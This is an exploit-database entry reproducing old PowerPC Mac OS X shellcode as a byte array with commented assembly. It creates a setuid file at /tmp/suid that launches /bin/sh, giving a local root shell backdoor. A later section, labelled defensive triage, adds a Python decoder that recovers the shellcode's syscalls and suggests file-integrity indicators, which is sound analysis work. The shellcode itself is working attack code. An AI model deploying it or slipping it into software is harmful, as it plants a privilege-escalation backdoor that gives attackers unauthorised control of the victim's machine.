OSX/PPC – Create /tmp/suid Shellcode (122 bytes)

Vulnerability ID: 1054663
Vulnerability type:
Published: 2004-09-26
Updated: 2004-09-26
CVE ID: N/A
CNNVD-ID: N/A
Platform: OSX_PPC
CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/13485
|Vulnerability details
Vulnerability details have not been disclosed
|Exploit (EXP)
/*
PPC OSX/Darwin Shellcode by B-r00t. 2003.
Does open(); write(); close(); exit();
See ASM below.
122 Bytes.
*/

char shellcode[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7f\xe8\x02\xa6\x39\x1f\x01\x71"
"\x39\x08\xfe\xf4\x7c\xa8\x29\xae"
"\x38\x7f\x01\x68\x38\x63\xfe\xf4"
"\x38\x80\x02\x01\x38\xa0\xff\xff"
"\x39\x40\x01\x70\x38\x0a\xfe\x95"
"\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x9f\x01\x72\x38\x84\xfe\xf4"
"\x38\xaa\xfe\x9c\x38\x0a\xfe\x94"
"\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x0a\xfe\x96\x44\xff\xff\x02"
"\x60\x60\x60\x60\x38\x0a\xfe\x91"
"\x44\xff\xff\x02\x2f\x74\x6d\x70"
"\x2f\x73\x75\x69\x64\x58\x23\x21"
"\x2f\x62\x69\x6e\x2f\x73\x68\x0a"
"\x73\x68";

int main (void) 
{
        __asm__("b _shellcode");
}

/*
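; PPC OS X / Darwin Shellcode by B-r00t.
; open(); write(); close(); exit()
; Creates an SUID '/tmp/suid' to execute '/bin/sh'.
;
.globl _main
.text
_main:
        xor.    r5, r5, r5              ; r5 = 0, sets cr0[EQ]
        bnel    _main                   ; never taken, but LR = address of next instruction
        mflr    r31                     ; r31 = _main + 8 (position-independent base)
        addi    r8, r31, 268+92+9       ; +268/-268 pairs keep NUL bytes out of the immediates
        addi    r8, r8, -268            ; r8 = address of the 'X' after "/tmp/suid"
        stbx    r5, r8, r5              ; overwrite 'X' with NUL to terminate the path
        addi    r3, r31, 268+92
        addi    r3, r3, -268            ; r3 = path
        li      r4, 513                 ; flags 0x201 = O_WRONLY | O_CREAT
        li      r5, -1                  ; mode: all permission bits set, including setuid
        li      r10, 368
        addi    r0, r10, -363           ; r0 = 5 (open)
        .long   0x44ffff02              ; sc, reserved bits set to avoid NUL bytes
        .long   0x60606060              ; padding: Darwin resumes here on error, one word later on success
        addi    r4, r31, 268+92+10
        addi    r4, r4, -268            ; r4 = buffer "#!/bin/sh\nsh"
        addi    r5, r10, -356           ; r5 = 12 (buffer length)
        addi    r0, r10, -364           ; r0 = 4 (write)
        .long   0x44ffff02
        .long   0x60606060
        addi    r0, r10, -362           ; r0 = 6 (close)
        .long   0x44ffff02
        .long   0x60606060
        addi    r0, r10, -367           ; r0 = 1 (exit)
        .long   0x44ffff02
path:   .asciz  "/tmp/suidX#!/bin/sh\nsh"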

*/

// milw0rm.com [2004-09-26]
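
A defender's static triage of the byte array above, added here as an example and not part of the original listing: a minimal interpreter for the few PowerPC instructions this sample uses, which recovers the syscall numbers hidden by the `li r10, 368` / `addi r0, r10, -N` encoding and the strings left after the self-patching `stbx`. The names `triage`, `SC` and `BSD_SYSCALLS` are made up for this example, and it assumes the data begins right after the last `sc` word.

```python
import struct

# The 122 bytes of the shellcode[] array on this page, written as hex.
SHELLCODE = bytes.fromhex(
    "7ca52a794082fffd7fe802a6391f0171" "3908fef47ca829ae387f01683863fef4"
    "3880020138a0ffff39400170380afe95" "44ffff0260606060389f01723884fef4"
    "38aafe9c380afe9444ffff0260606060" "380afe9644ffff0260606060380afe91"
    "44ffff022f746d702f73756964582321" "2f62696e2f73680a7368")

SC = 0x44FFFF02  # `sc` with reserved bits set so the word contains no NUL byte
BSD_SYSCALLS = {1: "exit", 4: "write", 5: "open", 6: "close"}

def triage(blob):
    """Return (syscalls, data); register values are offsets from the blob start."""
    mem, reg, lr, calls = bytearray(blob), [0] * 32, 0, []
    code_end = blob.rfind(struct.pack(">I", SC)) + 4  # assumption: data follows last sc
    for off in range(0, code_end, 4):
        (w,) = struct.unpack_from(">I", blob, off)
        op, d, a, b = w >> 26, (w >> 21) & 31, (w >> 16) & 31, (w >> 11) & 31
        xo = (w >> 1) & 0x3FF
        if w == SC:
            # Darwin/PPC: r0 = syscall number, r3.. = arguments.
            # Return values are not modeled, so r3 is stale after the first call.
            calls.append((BSD_SYSCALLS.get(reg[0], "?"), reg[0], reg[3], reg[4], reg[5]))
        elif op == 14:  # addi rD, rA, simm (this is `li` when rA == 0)
            simm = (w & 0xFFFF) - 0x10000 * ((w >> 15) & 1)
            reg[d] = ((reg[a] if a else 0) + simm) & 0xFFFFFFFF
        elif op == 16 and w & 1:  # bnel: not taken after xor., but LR = next address
            lr = off + 4
        elif op == 31 and xo == 339:  # mflr rD
            reg[d] = lr
        elif op == 31 and xo == 316:  # xor rA, rS, rB
            reg[a] = reg[d] ^ reg[b]
        elif op == 31 and xo == 215:  # stbx rS, rA, rB: NUL-terminates the path
            mem[(reg[a] if a else 0) + reg[b]] = reg[d] & 0xFF
    return calls, bytes(mem[code_end:])

if __name__ == "__main__":
    calls, data = triage(SHELLCODE)
    for name, num, r3, r4, r5 in calls:
        print(f"sc r0={num} ({name}) r3={r3:#x} r4={r4:#x} r5={r5:#x}")
    print("data after self-patch:", data)
```

The recovered open() arguments (flags 0x201, mode 0xffffffff) and the path `/tmp/suid` are the indicators worth carrying into file-integrity or audit rules.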
